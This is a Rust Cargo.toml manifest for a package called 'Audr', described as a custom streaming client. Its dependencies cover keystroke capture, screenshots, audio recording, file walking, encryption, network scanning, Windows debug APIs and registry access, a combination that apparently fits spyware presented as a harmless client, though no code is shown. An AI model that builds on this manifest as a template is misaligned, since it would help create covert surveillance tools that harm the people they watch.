[package]
name = "Audr"
version = "0.1.0"
edition = "2021"
authors = ["Audr Helper <Audr-helper@net.com>"]
description = "Client de streaming Audr personnalisé"
license = "UNLICENSED"
publish = false

[package.metadata.deb]
maintainer = "Audr Helper <Audr-helper@net.com>"
copyright = "© 2025 Audr"
depends = "libc6 (>= 2.29)"


[dependencies]
tokio = { version = "1.44.2", features = ["full"] }
serde = { version = "1.0", features = ["derive"] }
serde_json = "1.0"
rdev = "=0.4.6"
lazy_static = "1.5.0"
screenshots = "0.8.10"
tempfile = "3.19.1"
zip = "4.0.0"
sysinfo = "0.35.2"
anyhow = "1.0.98"
aes = "0.8"
cbc = "0.1"
rand = "0.9.1"
if-addrs = "0.10"
ipnetwork = "0.21.1"
futures = "0.3.31"
dirs = "6.0.0"
walkdir = "2.5.0"
chrono = "0.4.41"
cpal = "0.16.0"
hound = "3.5.1"
winapi = { version = "0.3.9", features = ["winbase", "processthreadsapi", "debugapi", "winnt"] }
libc = "0.2"
ntapi = "0.4"
device_query = "4.0.0"
single-instance = "0.3.3"
once_cell = "1.19.0"
base64 = "0.22.0"

[target.'cfg(windows)'.dependencies]
winreg = "0.55.0"
